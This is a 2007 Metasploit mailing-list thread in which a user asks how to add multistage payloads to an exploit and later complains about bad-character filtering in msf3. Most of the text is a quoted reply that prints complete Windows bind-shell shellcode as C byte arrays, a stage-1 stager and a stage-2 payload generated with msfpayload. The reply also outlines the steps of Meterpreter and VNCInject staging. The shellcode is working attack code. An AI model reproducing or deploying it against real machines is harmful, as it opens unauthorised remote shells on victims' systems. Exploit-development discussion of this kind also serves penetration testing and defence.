Building multistage payloaded exploits?

[j_fast_and_the_furious at hotmail.com (scotty to hotty)]

Thnx hdm for clarifying my research :P. now, i noticed problems when i specify bad characters in metasploit.... it 
always spits the payload out with the bad characters still in the exploit.... when i use msf2 it works fine but when i 
use msf3 it keeps everything i specify to get removed. any work arrounds to this problem? or am i doing something wrong?
















----------------------------------------> From: hdm at metasploit.com> To: framework at metasploit.com> Date: Mon, 24 
Sep 2007 16:36:36 -0500> Subject: Re: [framework] Building multistage payloaded exploits?>> The multistaged stuff isn't 
simple to implement outside of Metasploit.> There are intermediate stages and in some cases (Meterpreter) entire> 
client-side libraries that need to be used.>> If you want to use a "simple" stager (2 pieces), then msfpayload will> 
generate the correct blocks for you. For example:>> $ msfpayload windows/shell/bind_tcp LPORT=12345 C> /*> * 
windows/shell/bind_tcp - 201 bytes (stage 1)> * http://www.metasploit.com> * EXITFUNC=seh, LPORT=12345> */> unsigned 
char buf[] => "\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"> 
"\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"> 
"\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"> 
"\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"> 
"\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"> 
"\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"> 
"\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"> 
"\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x53\x43\x53\x43\x53"> 
"\x89\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6"> 
"\x66\xb9\xa8\x6f\xff\xd6\x97\x66\x68\x30\x39\x66\x53\x89\xe1"> 
"\x6a\x10\x51\x57\x66\xb9\x80\x3b\xff\xd6\x53\x57\x66\xb9\x75"> 
"\x49\xff\xd6\x54\x54\x54\x57\x66\xb9\x32\x4c\xff\xd6\x97\x50"> 
"\x66\xb9\x33\xce\xff\xd6\x89\xe1\x50\xb4\x0c\x50\x51\x57\x51"> "\x66\xb9\xc0\x38\xff\xe6";>> /*> * 
windows/shell/bind_tcp - 474 bytes (stage 2)> * http://www.metasploit.com> */> unsigned char buf[] => 
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"> 
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"> 
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"> 
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"> 
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"> 
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"> 
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"> 
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"> 
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"> 
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"> 
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"> 
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"> 
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"> 
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"> 
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"> 
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"> 
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"> 
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"> 
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"> 
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"> 
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"> 
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"> 
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"> 
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"> 
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"> 
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"> 
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"> 
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"> 
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"> 
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"> 
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"> "\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";>> If you want 
to use VNCInject or Meterpreter, it looks like:>> 1) Send the basic stager (same as stage 1 above)> 2) Send the 
intermediate stager (89 bytes)> 3) Send the DLLInject stager (~2800 bytes)> 4) Send the DLL itself (150k~+ bytes)> 5) 
Talk to the payload socket and handle the DLL> 6) Handle VNC or Meterpreter protocols>> Use something like Wireshark to 
match up the exploit output (sending> stage...) with the network traffic. If it was trivial, we would not have> needed 
all this Ruby code to do it ;-)>> -HD>>> On Monday 24 September 2007 16:12, scotty to hotty wrote:>> well since you'r 
on i was wondering if you can point me to an exploit>> with multistaged payloads? i need to learn how to do it in 
multiple>> stages instead of single.... i would like to find out how to do a>> multistage instead of single; heck i 
even tried finding out how using>> Paterva Maltego and it couldn't find anything i didnt already know....>> and>> On 
Saturday 22 September 2007 20:34, scotty to hotty wrote:>> can anyone help me out on how i could add some multistaged 
payload to>> my exploit? i only know how to use single stage shellcodes.... any help>> will be appreciated.>>

_________________________________________________________________
News, entertainment and everything you care about at Live.com. Get it now!
http://www.live.com/getstarted.aspx